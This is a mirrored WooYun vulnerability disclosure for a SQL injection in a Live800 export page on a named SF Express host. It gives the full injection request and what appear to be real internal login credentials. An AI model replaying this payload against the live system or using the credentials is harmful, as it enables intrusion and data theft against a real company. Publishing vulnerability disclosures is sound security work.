乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-20: 细节已通知厂商并且等待厂商处理中 2016-04-20: 厂商已经确认,细节仅向厂商公开 2016-04-30: 细节向核心白帽子及相关领域专家公开 2016-05-10: 细节向普通白帽子公开 2016-05-20: 细节向实习白帽子公开 2016-06-04: 细节向公众公开
网站:sf-ocs.sf-express.com:8080
POST /live800/sta/export/referrerSta.jsp HTTP/1.1Host: sf-ocs.sf-express.com:8080User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: JSESSIONID=9746AB381F13363694310F796030D11CConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 136export=csv&vn=dataAnalyseAdapter_referrer&operatorId=&fromTime=2016-02-21&toTime=2016-02-22&companyId=1 or 1=1&subStrSql=(select user())
位于内网:
账号:G730751密码:sf123456位于内网
危害等级:高
漏洞Rank:15
确认时间:2016-04-20 10:40
感谢对顺丰安全关注
暂无